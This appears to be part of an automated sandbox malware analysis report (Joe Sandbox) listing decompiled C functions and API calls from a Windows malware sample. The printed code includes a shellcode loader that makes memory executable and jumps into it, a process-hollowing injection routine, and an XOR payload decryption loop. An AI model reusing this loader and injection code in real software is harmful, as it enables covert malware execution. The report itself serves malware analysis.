    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2,00000000,004183DD), ref: 00417A84
    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2), ref: 00417A9C
    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AAE
    • GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AC0
    • GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AD2
    • GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7), ref: 00417AE4
    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000), ref: 00417AF6
    • GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 00417B08
    • GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 00417B1A
    • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 00417B2C
    • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 00417B3E
    • GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 00417B50
    • GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 00417B62
    • GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 00417B74
    • GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 00417B86
    • GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 00417B98
    • GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 00417BAA
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 0300966F, Relevance: 35.1, APIs: 15, Strings: 5, Instructions: 139
    C-Code - Quality: 73%
    			E0300966F(void* __eflags) {
				char _v5;
				long _v12;
				long _v16;
				int _v20;
				int _v24;
				char _v28;
				void* _v32;
				struct tagPIXELFORMATDESCRIPTOR _v72;
				void* _t41;
				int _t49;
				void* _t50;
				intOrPtr* _t58;
				long _t65;
				long _t69;
				int _t73;
				void* _t79;
				int _t80;

				_t41 = E03002C60(0x300cb48);
				_t80 = 0;
				if(_t41 > 0x1b3 && _v72.cStencilBits != 0x84b9b && _v72.cStencilBits != 0x1104) {
					E0300958A(_t41);
					ShellExecuteA(0, 0, 0, 0, 0, 0);
					ShellAboutW(0, 0, 0, 0);
					ExtractIconA(0, 0, 0);
					_push("osurhfoiuasdf asdiuyfghas dofioaysgfuioaysdgf");
					_push(0x300cb48);
					E03002BD0();
				}
				_v12 = 1;
				_v12 = 0x583e9;
				GetColorSpace(_t80);
				GetLogColorSpaceA(_t80, _t80, _t80);
				ChoosePixelFormat(_t80,  &_v72);
				SetICMMode(_t80, _t80);
				_v20 = _t80;
				_v24 = _t80;
				do {
					_t65 = GetPrivateProfileSectionNamesA(0x300cb48, _t80, "doifughsg siodufhg sdfoughjsiopdfughj");
					__imp__GetCalendarInfoW(_t80, _t80, _t80, _t80, _t80,  &_v28);
					_t49 = GetLocaleInfoW(_t80, _t80, 0x300cf50, _t80);
					if(_v20 > 0x7530 && _t65 != 0x6f6f3 && _v28 != 0x4278f9 && _t49 != 0x176cf5a) {
						_v24 = 0x6f;
						 *0x300cf48 = GetModuleHandleW(L"kernel32.dll");
					}
					_v20 = _v20 + 1;
				} while (_v24 != 0x6f);
				_t50 = LocalAlloc(_t80, _v12);
				_v24 = 0x30142d8;
				_t73 = _v24;
				_t79 = _t50;
				_t69 = 0;
				_v32 = _t79;
				if(_v12 > _t80) {
					_v20 = 0xfffffffe;
					_v20 = _v20 - _t73;
					_t23 = _t73 + 2; // 0x30142da
					_t58 = _t23;
					do {
						_t24 = _t58 - 1; // 0x586416a5
						_v5 =  *_t58;
						_t26 = _t58 - 2; // 0x6416a5c8
						 *((char*)(_t69 + _t79)) =  *_t26;
						 *((char*)(_t69 + _t79 + 1)) =  *_t24;
						 *((char*)(_t69 + _t79 + 2)) = _v5;
						_t58 = _t58 + 3;
						_t69 = _t69 + 3;
					} while (_v20 + _t58 < _v12);
				}
				_v12 = _t69;
				VirtualProtect(_t79, 0x583e9, 0x40,  &_v16);
				if(_v12 > _t80) {
					do {
						GetTickCount();
						_t80 = _t80 + 1;
					} while (_t80 < _v12);
				}
				E03009651( &_v12, _t79);
				_v32();
				return 0;
			}




















    0x0300967e
    0x03009683
    0x0300968b
    0x0300969f
    0x030096aa
    0x030096b4
    0x030096bd
    0x030096c3
    0x030096c8
    0x030096c9
    0x030096cf
    0x030096d0
    0x030096d7
    0x030096df
    0x030096e8
    0x030096f3
    0x030096fb
    0x03009701
    0x03009704
    0x03009707
    0x03009714
    0x0300971f
    0x0300972d
    0x0300973a
    0x03009759
    0x03009766
    0x03009766
    0x0300976b
    0x0300976e
    0x03009778
    0x0300977e
    0x03009785
    0x03009788
    0x0300978a
    0x0300978c
    0x03009792
    0x03009794
    0x0300979b
    0x0300979e
    0x0300979e
    0x030097a1
    0x030097a3
    0x030097a6
    0x030097a9
    0x030097ac
    0x030097af
    0x030097b6
    0x030097bd
    0x030097c2
    0x030097c5
    0x030097a1
    0x030097d6
    0x030097d9
    0x030097e2
    0x030097e4
    0x030097e4
    0x030097ea
    0x030097eb
    0x030097e4
    0x030097f5
    0x030097fa
    0x03009803

    APIs
    • _strlen.LIBCMT ref: 0300967E
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 030096AA
    • ShellAboutW.SHELL32(00000000,00000000,00000000,00000000), ref: 030096B4
    • ExtractIconA.SHELL32(00000000,00000000,00000000), ref: 030096BD
    • GetColorSpace.GDI32(00000000), ref: 030096DF
    • GetLogColorSpaceA.GDI32(00000000,00000000,00000000), ref: 030096E8
    • ChoosePixelFormat.GDI32(00000000,?), ref: 030096F3
    • SetICMMode.GDI32(00000000,00000000), ref: 030096FB
    • GetPrivateProfileSectionNamesA.KERNEL32(0300CB48,00000000,doifughsg siodufhg sdfoughjsiopdfughj), ref: 0300970E
    • GetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?), ref: 0300971F
    • GetLocaleInfoW.KERNEL32(00000000,00000000,0300CF50,00000000), ref: 0300972D
    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 03009760
    • LocalAlloc.KERNEL32(00000000,000583E9), ref: 03009778
    • VirtualProtect.KERNEL32(00000000,000583E9,00000040,?), ref: 030097D9
    • GetTickCount.KERNEL32 ref: 030097E4
      • Part of subcall function 0300958A: WinHttpCloseHandle.WINHTTP(00000000,00000000,030096A4), ref: 0300958E
      • Part of subcall function 0300958A: WinHttpConnect.WINHTTP(00000000,00000000,00000000,00000000), ref: 03009598
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    Function 00417F5C, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 236
    C-Code - Quality: 76%
    			E00417F5C(intOrPtr __eax, void* __ebx, short* __ecx, char __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v12;
				CONTEXT* _v16;
				void* _v20;
				void _v24;
				void _v28;
				long _v32;
				struct _PROCESS_INFORMATION _v48;
				struct _STARTUPINFOA _v116;
				CHAR* _t95;
				short* _t171;
				intOrPtr _t182;
				intOrPtr _t189;
				intOrPtr* _t194;
				short* _t196;
				void* _t197;
				void* _t199;
				void* _t200;
				intOrPtr _t201;
				void* _t215;

				_t215 = __fp0;
				_t199 = _t200;
				_t201 = _t200 + 0xffffff90;
				_t196 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404338(_v8);
				E00404338(_v12);
				_push(_t199);
				_push(0x418218);
				_push( *[fs:eax]);
				 *[fs:eax] = _t201;
				if(_v12 != 0) {
					_push(0x418230);
					_push(_v8);
					_push(0x41823c);
					_push(_v12);
					E00404208();
				}
				 *_a4 = 0;
				_t171 = _t196;
				if( *_t171 == 0x5a4d) {
					_t194 =  *((intOrPtr*)(_t171 + 0x3c)) + _t196;
					if( *_t194 == 0x4550) {
						E00402B60( &_v116, 0x44);
						E00402B60( &_v48, 0x10);
						_v116.cb = 0x44;
						_v116.dwFlags = 1;
						_v116.wShowWindow = 0;
						_t95 = E00404348(_v12);
						if(CreateProcessA(E00404348(_v8), _t95, 0, 0, 0, 4, 0, 0,  &_v116,  &_v48) != 0) {
							 *_a4 = _v48.dwProcessId;
							_v16 = E00417F28( &_v20);
							if(_v16 != 0) {
								_v16->ContextFlags = 0x10007;
								if(GetThreadContext(_v48.hThread, _v16) != 0) {
									ReadProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v24, 4,  &_v32);
									if( *(_t194 + 0x34) != _v24) {
										_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
									} else {
										if(NtUnmapViewOfSection(_v48.hProcess,  *(_t194 + 0x34)) != 0) {
											_v28 = VirtualAllocEx(_v48.hProcess, 0,  *(_t194 + 0x50), 0x3000, 0x40);
										} else {
											_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
										}
									}
									_t210 = _v28;
									if(_v28 != 0) {
										_t197 = E00417EA4(_t196, _t210);
										_t125 = _v28;
										if( *(_t194 + 0x34) != _v28) {
											E00417E10(_t215, _t197, _t194, _t125 -  *(_t194 + 0x34));
											 *(_t194 + 0x34) = _v28;
											E00405DE0( *((intOrPtr*)(_t171 + 0x3c)) + _t197, _t194);
										}
										WriteProcessMemory(_v48.hProcess, _v28, _t197,  *(_t194 + 0x50),  &_v32);
										WriteProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v28, 4,  &_v32);
										_v16->Eax =  *((intOrPtr*)(_t194 + 0x28)) + _v28;
										SetThreadContext(_v48.hThread, _v16);
										ResumeThread(_v48.hThread);
										WaitForSingleObject(_v48.hThread, 0xffffffff);
										_push(_t199);
										_push(0x4181d0);
										_push( *[fs:eax]);
										 *[fs:eax] = _t201;
										TerminateThread(_v48.hProcess, 0);
										CloseHandle(_v48.hProcess);
										_pop(_t189);
										 *[fs:eax] = _t189;
									}
								}
								VirtualFree(_v20, 0, 0x8000);
							}
							if( *_a4 == 0) {
								TerminateProcess(_v48, 0);
							}
						}
					}
				}
				_pop(_t182);
				 *[fs:eax] = _t182;
				_push(E0041821F);
				return E00403EAC( &_v12, 2);
			}























    0x00417f5c
    0x00417f5d
    0x00417f5f
    0x00417f65
    0x00417f67
    0x00417f6a
    0x00417f70
    0x00417f78
    0x00417f7f
    0x00417f80
    0x00417f85
    0x00417f88
    0x00417f8f
    0x00417f91
    0x00417f96
    0x00417f99
    0x00417f9e
    0x00417fa9
    0x00417fa9
    0x00417fb3
    0x00417fb5
    0x00417fbc
    0x00417fc5
    0x00417fcd
    0x00417fdd
    0x00417fec
    0x00417ff1
    0x00417ff8
    0x00417fff
    0x0041801c
    0x00418032
    0x0041803e
    0x00418048
    0x0041804f
    0x00418058
    0x0041806d
    0x0041808e
    0x00418099
    0x004180fc
    0x0041809b
    0x004180aa
    0x004180df
    0x004180ac
    0x004180c4
    0x004180c4
    0x004180aa
    0x004180ff
    0x00418103
    0x00418110
    0x00418115
    0x0041811a
    0x00418122
    0x0041812a
    0x00418139
    0x00418139
    0x0041814f
    0x0041816f
    0x0041817d
    0x0041818b
    0x00418194
    0x0041819f
    0x004181a6
    0x004181a7
    0x004181ac
    0x004181af
    0x004181b8
    0x004181c1
    0x004181c8
    0x004181cb
    0x004181cb
    0x00418103
    0x004181e5
    0x004181e5
    0x004181f0
    0x004181f8
    0x004181f8
    0x004181f0
    0x00418032
    0x00417fcd
    0x004181ff
    0x00418202
    0x00418205
    0x00418217

    APIs
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F28: VirtualAlloc.KERNEL32(00000000,000000D0,00001000,00000004,?,00418048,00000000,00418218), ref: 00417F39
    • GetThreadContext.KERNEL32(?,00000000), ref: 00418066
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
    • NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
    • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
    • SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
    • ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
    • TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
    • CloseHandle.KERNEL32(?), ref: 004181C1
    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
    • TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 00404E08, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136
    C-Code - Quality: 53%
    			E00404E08(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00404DF4(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00404DF4(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L00401248();
									while( *_t93 != 0) {
										_t90 = E00404DF4(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L00401248();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00401250();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L00401248();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00401250();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L00401248();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L00401248();
						}
					}
				}
				L17:
				return _v16;
			}



















    0x00404e14
    0x00404e17
    0x00404e1d
    0x00404e2a
    0x00404e2e
    0x00404e70
    0x00404e76
    0x00404eb3
    0x00000000
    0x00404e78
    0x00404e7f
    0x00404e90
    0x00404e95
    0x00404e9b
    0x00404ea3
    0x00404ea8
    0x00404eb6
    0x00404eb8
    0x00404ebe
    0x00404ec2
    0x00404ec9
    0x00404eca
    0x00404f75
    0x00404edc
    0x00404ee0
    0x00404eed
    0x00404ef4
    0x00404ef5
    0x00404efe
    0x00404eff
    0x00404f17
    0x00404f1c
    0x00404f1f
    0x00404f24
    0x00404f2a
    0x00404f2b
    0x00404f3b
    0x00404f3d
    0x00404f4d
    0x00404f54
    0x00404f5e
    0x00404f5f
    0x00404f64
    0x00404f6a
    0x00404f6b
    0x00404f71
    0x00404f73
    0x00000000
    0x00404f73
    0x00404f3b
    0x00404f1c
    0x00000000
    0x00404eed
    0x00404f81
    0x00404f88
    0x00404f8c
    0x00404f8d
    0x00404f8d
    0x00404ea8
    0x00404e95
    0x00404e7f
    0x00404e30
    0x00404e3b
    0x00404e3f
    0x00000000
    0x00404e41
    0x00404e41
    0x00404e4c
    0x00404e50
    0x00404e55
    0x00000000
    0x00404e57
    0x00404e5a
    0x00404e61
    0x00404e65
    0x00404e66
    0x00404e66
    0x00404e55
    0x00404e3f
    0x00404f92
    0x00404f9b

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
    • lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404DF4: CharNextA.USER32(?), ref: 00404DF7
    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 0041844E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
    C-Code - Quality: 50%
    			E0041844E() {
				struct _SYSTEM_INFO _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr* _t15;
				void* _t31;
				signed int _t34;
				void* _t38;
				void* _t39;
				void* _t45;
				void* _t51;

				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_push(_t45);
				_push(0x418517);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45 + 0xffffffd0;
				GetSystemInfo( &_v40);
				_t34 = 0;
				_t31 = 0x39a91;
				_t15 = 0x41944c;
				do {
					if(_t34 == 0x20) {
						_t34 = 0;
					}
					_t5 = (_t34 & 0x000000ff) + 0x452ee0; // 0x8845645c
					_t30 = ( *_t15 - _t34 ^  *_t5) + _t34;
					 *_t15 = ( *_t15 - _t34 ^  *_t5) + _t34;
					_t34 = _t34 + 1;
					_t15 = _t15 + 1;
					_t31 = _t31 - 1;
				} while (_t31 != 0);
				L5:
				_push("h`JE");
				_push("-t ");
				_push(0);
				E004070E8( &_v48, _t51, _v40.dwNumberOfProcessors >> 1);
				_push(_v48);
				_push(0x41853c);
				_push( *0x454a5c);
				E00404208();
				_push(_v44);
				E004029A4(0,  &_v52);
				_pop(_t38);
				E00417F5C(_v52, _t30, 0x41944c, _t38, _t39, _t42, _t51);
				goto L5;
			}














    0x0041845a
    0x0041845d
    0x00418460
    0x00418465
    0x00418466
    0x0041846b
    0x0041846e
    0x00418475
    0x0041847a
    0x0041847c
    0x00418481
    0x00418486
    0x00418489
    0x0041848b
    0x0041848b
    0x00418499
    0x0041849f
    0x004184a1
    0x004184a3
    0x004184a4
    0x004184a5
    0x004184a5
    0x004184a8
    0x004184a8
    0x004184ad
    0x004184b9
    0x004184be
    0x004184c3
    0x004184c6
    0x004184cb
    0x004184d9
    0x004184e1
    0x004184e7
    0x004184f4
    0x004184f5
    0x00000000

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 0040B2B4, Relevance: 3.0, APIs: 2, Instructions: 37
    C-Code - Quality: 46%
    			E0040B2B4(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x40b318);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E004040F8( &_v16, 7,  &_v11);
				_push(_v16);
				E00407174(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0040B31F);
				return E00403E88( &_v16);
			}








    0x0040b2b4
    0x0040b2bd
    0x0040b2c2
    0x0040b2c3
    0x0040b2c8
    0x0040b2cb
    0x0040b2da
    0x0040b2ea
    0x0040b2f2
    0x0040b2fb
    0x0040b304
    0x0040b307
    0x0040b30a
    0x0040b317

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040B318), ref: 0040B2DA
    • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040B318), ref: 0040B2F3
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 004076D4, Relevance: 1.5, APIs: 1, Instructions: 49
    C-Code - Quality: 100%
    			E004076D4(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				CHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t37;
				intOrPtr* _t38;
				intOrPtr _t46;
				intOrPtr _t48;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t46 = _v24;
				_t31 = E00404B0C(_v28, _t46, _v16, 0);
				_t37 = _a8;
				 *_t37 = _t31;
				 *((intOrPtr*)(_t37 + 4)) = _t46;
				_t48 = _v24;
				_t34 = E00404B0C(_v28, _t48, _v20, 0);
				_t38 = _a12;
				 *_t38 = _t34;
				 *((intOrPtr*)(_t38 + 4)) = _t48;
